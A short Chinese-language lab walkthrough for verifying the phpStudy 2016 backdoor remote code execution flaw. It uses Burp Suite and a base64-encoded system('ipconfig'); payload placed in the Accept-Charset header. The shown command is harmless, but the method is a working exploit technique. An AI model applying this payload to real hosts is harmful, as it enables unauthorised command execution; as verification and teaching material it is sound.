phpstudy2016 RCE漏洞验证

漏洞描述

PHPStudyRCE（Remote Code Execution），也称为phpstudy_backdoor漏洞，是指PHPStudy软件中存在的一个远程代码执行漏洞。

漏洞验证

打开phpstudy2016，用bp自带的浏览器访问www目录下的phpinfo.php文件，访问后结果如下：

然后在bp中将抓到的数据包发送到repeater模块：

将system(‘ipconfig’);命令做base64编码：

system('ipconfig');

编码后

c3lzdGVtKCdpcGNvbmZpZycpOw==

然后在repeater模块添加Accept-Charset: 字段，将base64编码放入：

Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

注意Accept-Encoding字段中gzip和deflate之间不能有空格！

去掉空格后点击send发送，ipconfig命令被执行：